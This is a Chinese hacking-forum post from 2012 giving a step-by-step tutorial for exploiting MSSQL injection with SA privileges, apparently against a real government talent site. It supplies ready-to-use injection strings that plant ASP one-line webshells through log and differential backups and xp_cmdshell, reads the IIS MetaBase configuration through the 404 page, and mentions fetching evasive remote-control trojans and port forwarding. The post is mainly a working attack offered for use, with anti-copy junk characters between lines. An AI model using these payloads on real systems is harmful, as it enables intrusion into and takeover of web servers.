找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2226|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
$ F% z: j4 E; u* ~
8 m& r4 v3 _8 ~) c9 M& o, l& W) G$ a
                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
, I  C# `3 D* W8 ?
, \( o" I' s2 {! \2 k4 Q                                                                 4 h: {6 `  f( |2 x/ J0 @6 c( Q; `
                                                                 
$ T% v) _$ b4 i' W                                                                  论坛: http://www.90team.net/
% d: X7 F3 W6 V* z2 u
8 O/ F; ]2 }9 \: ~4 x( G! p
! A, O; j/ q' O  V; q
9 x* f. J: n* V# F% B( u' _+ ?友情检测国家人才网
. I; i; F2 U9 Q' A# u& F. v2 ?' W& t) p
+ M" ?$ ~" T* f7 O$ a7 J4 O2 {/ _
内容:MSSQL注入SA权限不显错模式下的入侵
0 ~2 E& q2 {2 M# k0 [( s1 F7 y6 S$ [( F' h& C. F

, B1 k& V: @6 q" Y& ]一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
9 K. u" Y: t/ H. |4 ]0 r1 M7 i2 z8 m  e6 T; w, G& r9 q
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
7 V" z* b8 d0 t( @# m$ q5 s8 q5 m& p
! @. `3 w) f( v/ ?3 J: t
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
7 u) }! r* p' y$ x  D! W
. V/ i/ Q# L0 h5 E思路:9 L3 k* e6 P0 s- Y' @. X
$ Z/ Z  O: u/ }
首先:4 g3 T" m0 R5 R& L# \

5 k& ?( t9 @( H( E- W3 h% a通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。$ U8 J8 x  E2 n) Q# s

8 z  s' Y% r5 ]  r7 r1.日志备份获得Webshell
/ o! w' ~) i0 z) K% X; m' P$ {
+ F$ M* w& v( ^6 T) i( g' N2.数据库差异备份获得Webshell
' o7 N1 b, @! V/ q  c5 [1 l  x; D+ S% W9 j3 V) c: r! m( q
4.直接下载免杀远控木马。# Y0 a0 m  C' b% z" p4 h

: Q( S# x# [- u9 \% A7 l5.直接下载LCX将服务器端口转发出来
7 m3 `3 n9 M4 r) E
. C6 T3 w  H0 L  V# u6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。3 Y* w! c  U' o$ ?/ X) m
! d% t! K& O% C  L5 E) x& b

7 x' S- W: t( |! _, E( |
8 D  [0 I5 `4 l7 t在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
4 }/ f) c% w4 |2 s
. L4 S, S9 e; \: _9 d. \我直接演示后面一个方法
  v! q/ B6 A: j! Q8 L6 j- P0 S
1 ~7 p- q# K7 u( z3 O. }$ n& P
+ W4 ^! M% k( [. y分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL $ b) c2 d# S" c8 n& H' X- d

  A2 |7 C$ R9 V# a' x7 [; `% r1 k3 F! R# {- o7 Z: A6 x
( k( ]8 f* [/ }  n

8 u5 j; @' {8 b0 [, s+ S◆日志备份:
" O! s& N* L1 p
) J  Y6 N% ~0 H+ y, j, ~" g/ o5 l. r
1. 进行初始备份& K4 G) \4 y8 s" h! v
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
) a/ \  B. S, |" k  }4 A
3 q) p7 ]' n8 ?2. 插入数据
4 b5 Z% V/ [& m* u: [6 u;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--! l2 [& p8 m/ Z: F( w' h

( c# _8 g6 y- {; t% Z. I0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
* U- q/ ^; E# p1 g, p  
7 o# n1 P' l- r) a$ V: _3. 备份并获得文件,删除临时表
7 K2 m5 R8 z( f9 W! l' T& u;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--( z0 h3 [: P  b; q; m

. {( o: g! L/ R2 N1 U5 ?) a* S: L" o5 X$ M2 I+ d4 \  u

$ g7 |  [" |# O4 B4 _◆数据库差异备份
; p7 p; L/ T0 ^$ O: u
& h' \( t5 d" f# |(1. 进行差异备份准备工作
" S8 z! T, S8 N7 r! q6 H$ [( u( z- U
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
4 o+ y: r9 R% L: F% z3 _) N% f( h* \6 b# k: `; A8 X* z
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
1 m$ ?& w! v  I+ ]  _' X
7 O3 r, m, J' m  m0 F9 M$ @7 b$ {" U# O* M/ h
(2. 将数据写入到数据库1 P% G# }/ @$ t% m! h- i
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
! B2 A2 i) S; i  G: D" }
& _- ~4 N% R+ O  ?# M& z; r9 f0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
# O7 h$ R( H- V) e8 I6 k
: h# j: }( D8 s0 p& s$ f" H3. 备份数据库并清理临时文件
4 I  v) O9 [, p1 {: p2 r! j9 \) m2 _5 i
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
9 e! g- d- y! ~7 w) D! F. n8 E9 E' D- T8 j
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 ) }$ {1 M6 l! y" j
: `: R' s' Q& v/ Y  w  {8 l
: ?! V% _# ]3 U" d
7 |) n" K/ s" m, }" Z0 J) ?# k$ B
用^转义字符来写ASP(一句话木马)文件的方法:   - n! d1 V' g2 C4 ?: I3 P

; {9 }6 _7 q. g4 J# p& {1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
" _2 X3 |' `, h
- I# s+ W- t  ?8 [6 q+ ^) p+ E3 V# e2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
" ?  R+ k- a8 ^) O0 D. ^( z& o8 @# I7 p5 s* T- b) e9 {5 `; N
读取IIS配置信息获取web路径
+ m& e& P% v. N
: Y& `) C% ~9 q' F' @. e4 E' C     
# M& d. e# w6 t3 u# ]( {) h     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
' r  r. H, ~. G% G4 @
3 G* x4 |9 W; w+ L2 M  ~& t执行命令
0 _8 ^8 X7 a( S$ ]     . C, R( E5 f: q8 q
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
. P: p# a+ g9 C6 H5 g; Z
% k% R1 V- ^3 a
; T7 D4 N" Q0 d* T7 w1 J* u) F3 G& N: r1 n

) c: [4 |% C9 f5 V
1 N5 Z' j3 `: c4 I$ W/ |# a: {2 v0 N8 @3 @7 K! x- _0 d
7 E, R0 a9 {8 g

, R) _5 n; y. g
6 d. _& W$ O# y: i1 W4 a3 I0 G  j+ m0 }# o5 M' b3 W% B
2 w8 M% f7 n6 V  `* g% T

$ b9 x1 ~; m8 v! Z' d$ [* u& H1 _
/ A9 M# k6 V2 D. Q; E; n5 J. j) ~: [6 z: W3 ]
1 E, h0 r. \. t7 v' \- s

7 U  N0 v% H7 X7 k( `" H1 Y3 ~
+ ~$ u$ h8 W7 J9 Z% D( f
! E: e4 Z; l& P2 n6 X8 y9 {% m* l7 P# }

& h- j9 r5 e9 c# c- q
  \" x" C2 q7 c9 {% S% k% ?6 R
( J' d2 L" O' ?2 K. n# E0 V
$ l; q6 s# a' X1 L4 y0 u. z6 B- B  `! v" D& h! [  [. L1 U& ^

4 ]! P4 L* t  q' T" A0 I
. a9 E# v5 b* I$ G6 ?5 ~5 O2 Y% I3 L, d6 v' C
& @% x3 e9 S7 g0 f) H' G2 V
: ]% S, C& m: o3 ^" \
  |  x( y& w6 o- I& ?% q

# i2 y5 v3 m, U3 U& o
6 z) y; m  y0 d5 N" j7 y! O" I" m: m1 }. L
: Z1 i! Q5 Q# j8 J) w

9 c3 _1 u) L1 ~8 H: I7 P/ u. y) \3 @8 h- O: |; Q

1 y2 W( t3 U0 b. }
2 b6 v2 c9 l6 S6 c# B9 E5 D5 ^) D# N& g# ]7 ?
# G3 O, M* Y8 B- @+ z: U
4 H" J6 N; X6 E! i0 `7 d
/ h+ D7 T/ m% r5 d) V: Z7 u4 Z! [3 E7 N
( d7 k. \) a; y9 ?+ |0 z6 P
3 v: K& d  |5 G8 b1 z# Z, v

0 t6 F+ M+ s5 v  i6 O# G
- M. v/ e, l/ @0 l0 `/ Z; |# q: \: q/ J: S) G5 A5 d* G  c$ P" Y
/ \  i% q5 Z2 e0 s5 L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表